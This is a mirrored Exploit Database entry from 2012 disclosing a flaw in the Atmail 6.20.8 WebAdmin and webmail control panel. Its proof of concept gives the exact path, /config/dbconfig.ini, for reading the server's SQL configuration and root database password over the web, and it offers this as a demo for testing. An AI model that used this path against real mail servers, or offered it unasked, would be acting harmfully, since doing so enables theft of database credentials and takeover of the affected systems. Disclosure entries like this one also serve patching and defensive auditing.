Atmail WebAdmin and Webmail Control Panel – SQL Root Password Disclosure

• Exploit Database
• 108 阅读

• 作者： Ciph3r
  日期： 2012-07-23
• 类别：

  • webapps
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/20037/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28

  ###################################################################################### # Vuln Title: Atmail WebAdmin and webmail Control Panel Remote Access SQL Root password Vulnerability # # Author: FaryadR (a.k.a Ciph3r) # tested on : Atmail Email Server 6.20.8 # Twitter : https://twitter.com/faryadR # Mail : Ciph3r.secure@gmail.com # Website : http://0c0c0c0c.com # Vendor : http://atmail.com #Powered by Atmail 6.20.8 - WebAdmin Control Panel # ###################################################################################### [+]Vulnerability :   you can Access All Atmail Webadmin Mail server Configuration and SQL Root Password     [+]Poc :   Go to webmail and config Directory and type dbconfig.ini for Access all SQL Configuration   [+]Demo for Test Vuln :   [+]Atmail 6.20.8   http://server/config/dbconfig.ini